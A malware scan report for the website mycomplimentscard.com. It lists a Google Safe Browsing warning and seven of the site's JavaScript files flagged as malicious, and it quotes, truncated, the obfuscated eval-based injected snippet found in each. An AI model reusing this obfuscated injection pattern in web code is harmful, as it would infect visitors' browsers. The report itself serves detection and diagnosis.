Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mycomplimentscard.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mycomplimentscard.com/ | 200 OK Content-Length: 22305 Content-Type: text/html | clean |
http://mycomplimentscard.com/js/jquery-1.5.1.min.js | 200 OK Content-Length: 90751 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) r=eval;function vqvq(){zva=function(){--(d.body)}()};a=("47,155,174,165,152,173,160,166,165,47,157,67,100,57,60,47,202,24,21,47,175,150,171,47,172,173,150,173,160,152,104,56,150,161,150,177,56,102,24,21,47,175,150,171,47,152,166,165,173,171,166,163,163,154,171,104,56,160,165,153,154,177,65,167,157,167,56,102,24,21,47,175,150,171,47,157,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,157,65,172 Antivirus reports:
| ||
http://mycomplimentscard.com/js/tabbed.js | 200 OK Content-Length: 6180 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) r=eval;function vqvq(){zva=function(){--(d.body)}()};a=("47,155,174,165,152,173,160,166,165,47,157,67,100,57,60,47,202,24,21,47,175,150,171,47,172,173,150,173,160,152,104,56,150,161,150,177,56,102,24,21,47,175,150,171,47,152,166,165,173,171,166,163,163,154,171,104,56,160,165,153,154,177,65,167,157,167,56,102,24,21,47,175,150,171,47,157,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,157,65,172 Antivirus reports:
| ||
http://mycomplimentscard.com/js/scripts.js | 200 OK Content-Length: 8443 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) r=eval;function vqvq(){zva=function(){--(d.body)}()};a=("47,155,174,165,152,173,160,166,165,47,157,67,100,57,60,47,202,24,21,47,175,150,171,47,172,173,150,173,160,152,104,56,150,161,150,177,56,102,24,21,47,175,150,171,47,152,166,165,173,171,166,163,163,154,171,104,56,160,165,153,154,177,65,167,157,167,56,102,24,21,47,175,150,171,47,157,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,157,65,172 Antivirus reports:
| ||
http://mycomplimentscard.com/js/jquery.tipsy.js | 200 OK Content-Length: 9849 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) r=eval;function vqvq(){zva=function(){--(d.body)}()};a=("47,155,174,165,152,173,160,166,165,47,157,67,100,57,60,47,202,24,21,47,175,150,171,47,172,173,150,173,160,152,104,56,150,161,150,177,56,102,24,21,47,175,150,171,47,152,166,165,173,171,166,163,163,154,171,104,56,160,165,153,154,177,65,167,157,167,56,102,24,21,47,175,150,171,47,157,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,157,65,172 Antivirus reports:
| ||
http://mycomplimentscard.com/js/easing.js | 200 OK Content-Length: 10249 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) r=eval;function vqvq(){zva=function(){--(d.body)}()};a=("47,155,174,165,152,173,160,166,165,47,157,67,100,57,60,47,202,24,21,47,175,150,171,47,172,173,150,173,160,152,104,56,150,161,150,177,56,102,24,21,47,175,150,171,47,152,166,165,173,171,166,163,163,154,171,104,56,160,165,153,154,177,65,167,157,167,56,102,24,21,47,175,150,171,47,157,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,157,65,172 Antivirus reports:
| ||
http://mycomplimentscard.com/js/jquery.ui.totop.js | 200 OK Content-Length: 7229 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) r=eval;function vqvq(){zva=function(){--(d.body)}()};a=("47,155,174,165,152,173,160,166,165,47,157,67,100,57,60,47,202,24,21,47,175,150,171,47,172,173,150,173,160,152,104,56,150,161,150,177,56,102,24,21,47,175,150,171,47,152,166,165,173,171,166,163,163,154,171,104,56,160,165,153,154,177,65,167,157,167,56,102,24,21,47,175,150,171,47,157,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,157,65,172 Antivirus reports:
| ||
http://mycomplimentscard.com/js/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 14480 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) r=eval;function vqvq(){zva=function(){--(d.body)}()};a=("47,155,174,165,152,173,160,166,165,47,157,67,100,57,60,47,202,24,21,47,175,150,171,47,172,173,150,173,160,152,104,56,150,161,150,177,56,102,24,21,47,175,150,171,47,152,166,165,173,171,166,163,163,154,171,104,56,160,165,153,154,177,65,167,157,167,56,102,24,21,47,175,150,171,47,157,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,157,65,172 Antivirus reports:
| ||
http://mycomplimentscard.com/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://mycomplimentscard.com/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mycomplimentscard.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 22:32:35 GMT
Server: nginx/1.6.2
Content-Type: text/html
GET / HTTP/1.1
Host: mycomplimentscard.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 22:32:35 GMT
Server: nginx/1.6.2
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: mycomplimentscard.com
Referer: http://www.google.com/search?q=mycomplimentscard.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mycomplimentscard.com
Referer: http://www.google.com/search?q=mycomplimentscard.com
Result:
The result is similar to the first query. There are no suspicious redirects found.